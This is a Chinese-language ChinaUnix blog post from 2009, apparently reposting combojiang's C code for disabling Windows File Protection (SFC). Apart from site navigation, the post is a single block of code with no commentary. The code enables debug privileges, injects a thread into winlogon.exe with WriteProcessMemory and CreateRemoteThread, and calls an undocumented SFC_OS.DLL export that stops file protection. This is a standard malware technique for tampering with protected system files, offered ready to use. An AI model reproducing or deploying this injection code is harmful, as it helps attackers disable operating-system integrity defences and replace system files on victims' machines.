combojiang关闭SFc的代码-kanghtta-ChinaUnix博客

只记今朝kang.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

kanghtta

博客访问： 1762679
博文数量： 290
博客积分： 10653
博客等级：上将
技术积分： 3178
用户组：普通用户
注册时间： 2007-10-24 23:08

文章分类

全部博文（290）

Python（3）
Exploit（0）
Android（0）
文件格式（1）
QT编程（4）
调试器（2）

dbg（1）

IDA（0）

OllyIce（0）

windbg（1）
Linux内核分析（13）

系统引导（11）
模式匹配（0）
驱动开发技术（4）

驱动开发相关资料（0）

学习笔记（1）

WDK文档（1）
工具使用（10）
源代码阅读（19）

grub源代码（2）

Service（8）

CRT（4）

Visual C++（3）

汇编（1）
WWW程序设计（1）

服务器（0）

JavaScript（0）

PHP（0）

CSS（0）

HTML（0）
Visual C++ SDK （17）
经典视频收集（13）
Shell Code揭秘（2）
诗词歌赋赏析（0）
读书（1）
英语学习（4）

新概念英语（0）

第四册（0）

第三册（0）

第二册（2）

第一册（0）

介词用法总结（1）

新视野大学英语（0）
经典文章转载（44）
系统优化与网络安（14）
心情日记（18）
计算机体系结构相（2）
linux学习（26）
操作系统-WINDOWS（10）
计算机网络（15）

网络流媒体协议标（0）

RFC文档（2）

Network Programm（6）
反汇编与加密解密（9）

PackKer（1）
汇编语言程序设计（29）
数据库技术（3）

Sql和高级语言的（1）

SQl server 2000（0）
数据结构与语言学（26）

逆向C++（1）

算法与数据结构（4）

java 程序设计（1）

C++语言基础（17）

C++现代大学教程（3）
未分配的博文（0）

文章存档

2013年（6）

2012年（15）

2011年（25）

2010年（86）

2009年（52）

2008年（66）

2007年（40）

我的朋友

相关博文

combojiang关闭SFc的代码

分类： C/C++

2009-07-06 17:37:19

#define WIN32_LEAN_AND_MEAN #include <windows.h> #include <Shlwapi.h> #include <sfc.h> #include <stdlib.h> #include <stdio.h> #include <iostream> #include <tlhelp32.h> #pragma comment(lib,"sfc.lib") #pragma comment(lib,"shlwapi.lib") #pragma check_stack (off) DWORD thread_func (FARPROC sfc_terminate) { sfc_terminate(); return 0; } void after_thread_func(void) { } #pragma check_stack //调整权限 int AdjustPrivileges(void) { HANDLE token_handle; int ret=0; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &token_handle)) { LUID luid; if(LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) { TOKEN_PRIVILEGES tk_priv; tk_priv.PrivilegeCount=1; tk_priv.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; tk_priv.Privileges[0].Luid=luid; if(AdjustTokenPrivileges(token_handle,FALSE,&tk_priv,0,NULL,NULL)) ret=1; } CloseHandle(token_handle); } return ret; } //根据取得进程号 DWORD GetProcessID(const char* pname) { HANDLE hProcessSnap = NULL; DWORD bRet = 0; PROCESSENTRY32 pe32 = {0}; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) return (FALSE); pe32.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hProcessSnap, &pe32)) { do { if (stricmp(pe32.szExeFile, pname) == 0) { bRet = pe32.th32ProcessID; break; } }while (Process32Next(hProcessSnap, &pe32)); } CloseHandle (hProcessSnap); return (bRet); } //关闭windows文件保护 void TerminateSfc() { DWORD wpid = 0; wpid = GetProcessID("winlogon.exe"); HANDLE remote_thread; HMODULE sfc=LoadLibrary("SFC_OS.DLL"); FARPROC sfc_terminate=GetProcAddress(sfc, (char *) 2); if (!AdjustPrivileges()) { MessageBox(NULL, "调整权限错误", "", MB_OK); exit(0); } HANDLE process=OpenProcess(PROCESS_ALL_ACCESS, FALSE, wpid); if(!process) { exit(0); } LPVOID remote_mem=VirtualAllocEx(process,NULL,(SIZE_T) ((char *)after_thread_func-(char *)thread_func),MEM_COMMIT,PAGE_READWRITE); if(!remote_mem) { printf("Error while commiting memory in the remote process\n"); goto clean_up; } if(!WriteProcessMemory(process,remote_mem,(char *) thread_func,(SIZE_T) ((char *)after_thread_func-(char *)thread_func),(SIZE_T *) 0)) { printf("Error %d while writing to the remote process\n", GetLastError()); goto clean_up; } remote_thread=CreateRemoteThread(process,NULL,0,(LPTHREAD_START_ROUTINE) remote_mem,(LPVOID) sfc_terminate,0,NULL); if(!remote_thread) { printf("Error while creating remote thread in the process\n"); goto clean_up; } if(WaitForSingleObject(remote_thread, 10*1000)==WAIT_TIMEOUT) printf("Timeout occured while waiting for the remote thread\n"); CloseHandle(remote_thread); clean_up: if(remote_mem) VirtualFreeEx(process, remote_mem, 0, MEM_RELEASE); CloseHandle(process); }

阅读(1218) | 评论(0) | 转发(0) |

上一篇：替换服务但原服务不失效的方法

下一篇：关闭windows 文件保护机制 SFC

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6